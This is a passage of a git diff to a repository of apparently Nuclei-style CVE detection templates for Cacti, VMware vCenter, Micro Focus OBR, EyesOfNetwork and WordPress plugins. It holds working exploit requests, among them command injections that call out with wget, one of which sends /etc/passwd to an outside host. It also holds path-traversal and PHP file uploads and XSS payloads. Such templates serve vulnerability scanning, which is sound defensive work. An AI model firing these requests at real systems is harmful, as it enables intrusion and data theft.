execute arbitrary SQL queries or remote code on the affected system. + remediation: | + Upgrade to a patched version of EyesOfNetwork or apply the necessary security patches to mitigate the vulnerabilities. reference: - https://github.com/h4knet/eonrce - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb - - https://nvd.nist.gov/vuln/detail/CVE-2020-8657 - https://github.com/EyesOfNetworkCommunity/eonweb/issues/50 + - https://nvd.nist.gov/vuln/detail/CVE-2020-8654 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-8654 cwe-id: CWE-78 - tags: cve,cve2020,cisa,eyesofnetwork,rce,authenticated + epss-score: 0.04987 + epss-percentile: 0.92656 + cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: eyesofnetwork + product: eyesofnetwork + tags: cve2020,cve,cisa,eyesofnetwork,rce,authenticated,msf,sqli -requests: +http: - method: GET path: - "{{BaseURL}}/css/eonweb.css" - extractors: - - type: regex - name: version - internal: true - part: body - group: 1 - regex: - - '# VERSION : ([0-9.]+)' - matchers-condition: and matchers: - type: dsl @@ -45,3 +48,13 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + name: version + group: 1 + regex: + - "# VERSION : ([0-9.]+)" + internal: true + part: body +# digest: 4a0a0047304502207ebd6b469ac0bd67dd7bc462fa62ef88bde2a9cb294df7a70aecebfd8f51f913022100be00ea371f5c1dbe5dd0833ee69f20b921c315d38f0cca3ba9d8e3af3b938674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-8813.yaml b/poc/cve/cve-2020-8813.yaml new file mode 100644 index 0000000000..3636aae3bc --- /dev/null +++ b/poc/cve/cve-2020-8813.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-8813 + +info: + name: Cacti v1.2.8 - Unauthenticated Remote Code Execution + author: gy741 + severity: high + description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability. + reference: + - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ + - https://github.com/Cacti/cacti/releases + - https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129 + - https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-8813 + cwe-id: CWE-78 + tags: cve,cve2020,cacti,rce,oast + +requests: + - raw: + - | + GET /graph_realtime.php?action=init HTTP/1.1 + Host: {{Hostname}} + Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}} + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/poc/cve/cve-2020-9047.yaml b/poc/cve/cve-2020-9047.yaml index 4761bac1d4..90d8a3501c 100644 --- a/poc/cve/cve-2020-9047.yaml +++ b/poc/cve/cve-2020-9047.yaml @@ -15,9 +15,16 @@ info: An attacker with administrative privileges could potentially download and run a malicious executable that could allow OS command injection on the system. - - Source/References: + reference: - https://github.com/norrismw/CVE-2020-9047 + - https://www.johnsoncontrols.com/cyber-solutions/security-advisories + - https://www.us-cert.gov/ics/advisories/ICSA-20-170-01 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2020-9047 + cwe-id: CWE-347 + tags: cve,cve2020,rce,exacqvision,service requests: - method: GET diff --git a/poc/cve/cve-2020-9054.yaml b/poc/cve/cve-2020-9054.yaml index 4c74eec890..dfaeba128c 100644 --- a/poc/cve/cve-2020-9054.yaml +++ b/poc/cve/cve-2020-9054.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-9054 cwe-id: CWE-78 - tags: cve,cve2020,rce,zyxel,injection,kev + tags: cve,cve2020,rce,zyxel,injection requests: - method: GET diff --git a/poc/cve/cve-2021-20092.yaml b/poc/cve/cve-2021-20092.yaml index 6ac3015c2c..7a029962c1 100644 --- a/poc/cve/cve-2021-20092.yaml +++ b/poc/cve/cve-2021-20092.yaml @@ -12,7 +12,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-20091 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-20092 cwe-id: CWE-200 tags: cve,cve2021,buffalo,firmware,iot diff --git a/poc/cve/cve-2021-20150.yaml b/poc/cve/cve-2021-20150.yaml index 0e144f4cd1..af8daab9cc 100644 --- a/poc/cve/cve-2021-20150.yaml +++ b/poc/cve/cve-2021-20150.yaml @@ -9,8 +9,8 @@ info: - https://www.tenable.com/security/research/tra-2021-54 - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 5.30 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 cve-id: CVE-2021-20150 cwe-id: CWE-287 metadata: diff --git a/poc/cve/cve-2021-20792.yaml b/poc/cve/cve-2021-20792.yaml index c5856c90db..8430ef6363 100644 --- a/poc/cve/cve-2021-20792.yaml +++ b/poc/cve/cve-2021-20792.yaml @@ -8,9 +8,11 @@ info: reference: - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf - https://nvd.nist.gov/vuln/detail/CVE-2021-20792 + - https://quizandsurveymaster.com/ + - https://jvn.jp/en/jp/JVN65388002/index.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-20792 cwe-id: CWE-79 tags: wordpress,cve,cve2021,wp-plugin,authenticated diff --git a/poc/cve/cve-2021-21972.yaml b/poc/cve/cve-2021-21972.yaml new file mode 100644 index 0000000000..08a5fd002f --- /dev/null +++ b/poc/cve/cve-2021-21972.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-21972 + +info: + name: VMware vSphere Client (HTML5) - Remote Code Execution + author: dwisiswant0 + severity: critical + description: VMware vCenter vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). + reference: + - https://swarm.ptsecurity.com/unauth-rce-vmware/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-21972 + - https://www.vmware.com/security/advisories/VMSA-2021-0002.html + - http://packetstormsecurity.com/files/161590/VMware-vCenter-Server-7.0-Arbitrary-File-Upload.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-21972 + cwe-id: CWE-269 + tags: cve,cve2021,vmware,rce,vcenter + +requests: + - method: GET + path: + - "{{BaseURL}}/ui/vropspluginui/rest/services/getstatus" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "VSPHERE-UI-JSESSIONID" + part: header + condition: and + - type: regex + regex: + - "(Install|Config) Final Progress" + part: body + +# Enhanced by mp on 2022/05/05 diff --git a/poc/cve/cve-2021-21978.yaml b/poc/cve/cve-2021-21978.yaml index db2e2800a8..51513779bc 100644 --- a/poc/cve/cve-2021-21978.yaml +++ b/poc/cve/cve-2021-21978.yaml @@ -8,8 +8,6 @@ info: VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application. An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container. - remediation: | - Upgrade to VMware View Planner version 4.6 SP1 or later to mitigate this vulnerability. reference: - https://twitter.com/osama_hroot/status/1367258907601698816 - https://nvd.nist.gov/vuln/detail/CVE-2021-21978 @@ -19,17 +17,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-21978 - cwe-id: CWE-20 - epss-score: 0.97375 - epss-percentile: 0.99888 - cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: vmware - product: view_planner - tags: cve,cve2021,vmware,rce,packetstorm,fileupload,intrusive + cwe-id: CWE-434 + tags: cve,cve2021,vmware,rce -http: +requests: - raw: - | POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1 @@ -49,16 +40,15 @@ http: matchers-condition: and matchers: - - type: dsl - dsl: - - "len(body) == 28" - + - type: status + status: + - 200 - type: word - part: body words: - "File uploaded successfully." + part: body + - type: dsl + dsl: + - "len(body) == 28" # length of "\nFile uploaded successfully." - - type: status - status: - - 200 -# digest: 4b0a00483046022100b62b6618a404c6da47792ebf7c2fbd654ba081e2b4e878cf367f04d3f9fda9dd022100e7625813a7894a33f4dfeadcb91e410330c1d40df1fb958359e283bb876efc62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by mp on 2022/05/05 diff --git a/poc/cve/cve-2021-22005.yaml b/poc/cve/cve-2021-22005.yaml new file mode 100644 index 0000000000..12606d2108 --- /dev/null +++ b/poc/cve/cve-2021-22005.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-22005 + +info: + name: VMware vCenter Server - Arbitrary File Upload + author: PR3R00T + severity: critical + description: VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file. + reference: + - https://kb.vmware.com/s/article/85717 + - https://www.vmware.com/security/advisories/VMSA-2021-0020.html + - https://core.vmware.com/vmsa-2021-0020-questions-answers-faq + - https://nvd.nist.gov/vuln/detail/CVE-2021-22005 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-22005 + cwe-id: CWE-434 + tags: cve,cve2021,vmware,vcenter,upload + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + test_data + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + - "status_code_2 == 201" + - "contains(body_1, 'VMware vSphere')" + - "content_length_2 == 0" + condition: and + +# Enhanced by mp on 2022/05/05 diff --git a/poc/cve/cve-2021-22054.yaml b/poc/cve/cve-2021-22054.yaml new file mode 100644 index 0000000000..e96b40f597 --- /dev/null +++ b/poc/cve/cve-2021-22054.yaml @@ -0,0 +1,47 @@ +id: CVE-2021-22054 + +info: + name: VMWare Workspace ONE UEM - Server-Side Request Forgery + author: h1ei1 + severity: high + description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information. + impact: | + An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure. + remediation: | + Apply the necessary patches or updates provided by VMWare to fix the vulnerability. + reference: + - https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/ + - https://www.vmware.com/security/advisories/VMSA-2021-0029.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-22054 + - https://github.com/fardeen-ahmed/Bug-bounty-Writeups + - https://github.com/nomi-sec/PoC-in-GitHub + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-22054 + cwe-id: CWE-918 + epss-score: 0.74813 + epss-percentile: 0.98065 + cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: vmware + product: workspace_one_uem_console + fofa-query: banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx" + tags: cve2021,cve,vmware,workspace,ssrf + +http: + - method: GET + path: + - "{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A" + + matchers-condition: and + matchers: + - type: word + words: + - "Interactsh Server" + + - type: status + status: + - 200 +# digest: 4a0a004730450221008cded273bebf41eff90732aed8ea7da8aa14ca8124eaa2032d424ca27e56d6e7022079f5f692df095ec9105de7a2f9449144593cfd651fe28038d367431e92871cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-22214.yaml b/poc/cve/cve-2021-22214.yaml index 0b010e66ba..72ec444e21 100644 --- a/poc/cve/cve-2021-22214.yaml +++ b/poc/cve/cve-2021-22214.yaml @@ -1,8 +1,8 @@ id: CVE-2021-22214 info: - author: Suman_Kar,GitLab Red Team name: Unauthenticated Gitlab SSRF - CI Lint API + author: Suman_Kar,GitLab Red Team severity: high description: | When requests to the internal network for webhooks are enabled, @@ -20,14 +20,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-22175 - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html - https://docs.gitlab.com/ee/api/lint.html - metadata: - shodan-query: http.title:"GitLab" - tags: cve,cve2021,gitlab,ssrf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.60 + cvss-score: 8.6 cve-id: CVE-2021-22214,CVE-2021-39935,CVE-2021-22175 cwe-id: CWE-918 + metadata: + shodan-query: http.title:"GitLab" + tags: cve,cve2021,gitlab,ssrf requests: - method: POST diff --git a/poc/cve/cve-2021-22502.yaml b/poc/cve/cve-2021-22502.yaml index a321359dd9..cb68b9daba 100644 --- a/poc/cve/cve-2021-22502.yaml +++ b/poc/cve/cve-2021-22502.yaml @@ -1,42 +1,63 @@ id: CVE-2021-22502 info: - name: Micro Focus Operation Bridge Reporter (OBR) RCE + name: Micro Focus Operations Bridge Reporter - Remote Code Execution author: pikpikcu severity: critical - reference: | - https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22502 - tags: cve,cve2021,obr,rce + description: | + Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. + remediation: | + Apply the latest security patches or updates provided by Micro Focus to mitigate this vulnerability. + reference: + - https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md + - https://softwaresupport.softwaregrp.com/doc/KM03775947 + - https://www.zerodayinitiative.com/advisories/ZDI-21-153/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-22502 + - https://www.zerodayinitiative.com/advisories/ZDI-21-154/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-22502 + cwe-id: CWE-78 + epss-score: 0.95993 + epss-percentile: 0.99434 + cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microfocus + product: operation_bridge_reporter + tags: cve2021,cve,microfocus,obr,rce,kev -requests: +http: - raw: - | POST /AdminService/urest/v1/LogonResource HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - Content-Length: 69 - {"userName":"administrator","credential":"password"} - - | - POST /AdminService/urest/v1/LogonResource HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - Content-Length: 69 - {"userName":"something `wget --post-file /etc/passwd burpcollaborator.net`","credential":"whatever"} + + {"userName":"something `wget {{interactsh-url}}`","credential":"whatever"} + matchers-condition: and matchers: - - type: word + part: interactsh_protocol words: - - "application/json" - part: header + - "http" + - "dns" - type: word - words: - - "An error occurred. Please contact your system administrator" part: body + words: + - "An error occurred" + - "AUTHENTICATION_FAILED" condition: and + - type: word + part: header + words: + - "application/json" + - type: status status: - 401 +# digest: 4b0a00483046022100ed38ca4d38ee6a8827ce0cb424c58a1c6f7273942f72850e30a51a47a8ced4e80221009e6de8be7a1e2e0bca9cba77fac3f7d24b41648cf318f9678bc391420570f366:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-24235.yaml b/poc/cve/cve-2021-24235.yaml new file mode 100644 index 0000000000..903589f3e3 --- /dev/null +++ b/poc/cve/cve-2021-24235.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-24235 + +info: + name: Goto - Tour & Travel < 2.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Goto WordPress theme before 2.0 does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-24235 + - https://wpscan.com/vulnerability/eece90aa-582b-4c49-8b7c-14027f9df139 + - https://m0ze.ru/vulnerability/[2021-02-10]-[WordPress]-[CWE-79]-Goto-WordPress-Theme-v1.9.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24235 + cwe-id: CWE-79 + tags: cve,cve2021,wordpress,xss,wp-theme + +requests: + - method: GET + path: + - '{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13' + + matchers-condition: and + matchers: + - type: word + words: + - "input/Autofocus/%0D*/Onfocus=alert(123);" + - "goto-tour-list-js-extra" + part: body + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-24236.yaml b/poc/cve/cve-2021-24236.yaml new file mode 100644 index 0000000000..d670c0c1cb --- /dev/null +++ b/poc/cve/cve-2021-24236.yaml @@ -0,0 +1,95 @@ +id: "CVE-2021-24236" + +info: + name: WordPress Imagements <=1.2.5 - Arbitrary File Upload + author: pussycat0x + severity: critical + description: | + WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code. + impact: | + This vulnerability can lead to remote code execution and compromise the affected WordPress site. + remediation: | + Update WordPress Imagements plugin to version 1.2.6 or later to fix the arbitrary file upload vulnerability. + reference: + - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea + - https://wordpress.org/plugins/imagements/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24236 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: "CVE-2021-24236" + cwe-id: CWE-434 + epss-score: 0.15028 + epss-percentile: 0.95292 + cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: imagements_project + product: imagements + framework: wordpress + tags: cve2021,cve,wp,unauth,imagements,wpscan,fileupload,wordpress,wp-plugin,intrusive,imagements_project +variables: + php: "{{to_lower('{{randstr}}')}}.php" + post: "1" + +http: + - raw: + - | + POST /wp-comments-post.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU + + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="comment" + + {{randstr}} + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="author" + + {{randstr}} + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="email" + + {{randstr}}@email.com + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="url" + + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="checkbox" + + + yes + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="naam" + + {{randstr}} + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="image"; filename="{{php}}" + Content-Type: image/jpeg + + + + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="submit" + + Post Comment + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="comment_post_ID" + + {{post}} + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="comment_parent" + + 0 + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU-- + - | + GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: body_2 + words: + - "CVE-2021-24236" +# digest: 490a00463044022044c39b76c1670bd3821e888a59c2fcc7c2bebcfb2b62512c46e5d5106b91756302202d835016944e0d0c1b7eb6a83ff6a8fd8d13145e32dd2ad9b570e45291d08ea8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-24286.yaml b/poc/cve/cve-2021-24286.yaml new file mode 100644 index 0000000000..88ac97423a --- /dev/null +++ b/poc/cve/cve-2021-24286.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-24286 + +info: + name: WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue. + remediation: Fixed in version 1.3.1 + reference: + - https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27 + - https://www.exploit-db.com/exploits/50350 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24286 + - https://wordpress.org/plugins/redirect-404-to-parent/ + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24286 + cwe-id: CWE-79 + epss-score: 0.00231 + epss-percentile: 0.60494 + cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 2 + vendor: mooveagency + product: redirect_404_to_parent + framework: wordpress + tags: cve2021,cve,xss,wordpress,wpscan,authenticated,exploitdb,wp-plugin,mooveagency + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "alert%28document.domain%29") && contains(body_2, "Moove redirect 404")' + - 'status_code_2 == 200' + condition: and +# digest: 4b0a004830460221009c8a16dca3ea8098cdf84c96ec66655812cb68fb55b9e286f7fe420d60faa9110221009d1a382904cfdd55a6f49320a79ef9b8f3b938ad8bc9db2d8b1fadfd597b6e3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-24291.yaml b/poc/cve/cve-2021-24291.yaml index a0d452ef52..63ca46b69d 100644 --- a/poc/cve/cve-2021-24291.yaml +++ b/poc/cve/cve-2021-24291.yaml @@ -3,27 +3,36 @@ id: CVE-2021-24291 info: name: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS) author: geeknik - description: The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users) - reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a severity: medium - tags: cve,cve2021,10web,xss + description: The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users) + reference: + - https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a + - https://packetstormsecurity.com/files/162227/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24291 + cwe-id: CWE-79 + tags: cve,cve2021,xss,wordpress,wp-plugin,photo requests: - method: GET path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&tag=%22%20onmouseover=alert(1)%3E" - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&theme_id=%22%20onmouseover=alert(1)%3E" - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery_id=1%22%20onmouseover=alert(1)%3E" + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//' matchers-condition: and matchers: - type: status status: - 200 + - type: word part: header words: - "text/html" + - type: word words: - - "\" onmouseover=alert(1)>" + - "onmouseover=alert(document.domain)//" + - "wp-content/uploads/photo-gallery" + condition: and diff --git a/poc/cve/cve-2021-24300.yaml b/poc/cve/cve-2021-24300.yaml index 33ab74ea05..d825b9c184 100644 --- a/poc/cve/cve-2021-24300.yaml +++ b/poc/cve/cve-2021-24300.yaml @@ -1,21 +1,35 @@ id: CVE-2021-24300 info: - name: PickPlugins Product Slider for WooCommerce < 1.13.22 - XSS + name: WordPress WooCommerce <1.13.22 - Cross-Site Scripting author: cckuailong severity: medium - description: The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue. + description: WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update WordPress WooCommerce plugin to version 1.13.22 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837 - https://nvd.nist.gov/vuln/detail/CVE-2021-24300 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24300 cwe-id: CWE-79 - tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated + epss-score: 0.00338 + epss-percentile: 0.70768 + cpe: cpe:2.3:a:pickplugins:product_slider_for_woocommerce:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: pickplugins + product: product_slider_for_woocommerce + framework: wordpress + tags: cve2021,cve,xss,wp,wordpress,wp-plugin,authenticated,wpscan,pickplugins -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -29,7 +43,6 @@ requests: GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -47,3 +60,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100c921ac5e1370ee8254b2f60b17eb43e9636eab5381b19d528ddffe26ebbd0e670220460bf20def01d52a5c93aca05c79a748d9244053258932d97f65ccb5323b410a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-24340.yaml b/poc/cve/cve-2021-24340.yaml index 860fac55a3..d23a363deb 100644 --- a/poc/cve/cve-2021-24340.yaml +++ b/poc/cve/cve-2021-24340.yaml @@ -9,12 +9,13 @@ info: - https://www.exploit-db.com/exploits/49894 - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ - https://github.com/Udyz/WP-Statistics-BlindSQL - tags: cve,cve2021,wordpress,wp-plugin,unauth,sqli,blind + - https://wpscan.com/vulnerability/d2970cfb-0aa9-4516-9a4b-32971f41a19c classification: cvss-metrics: 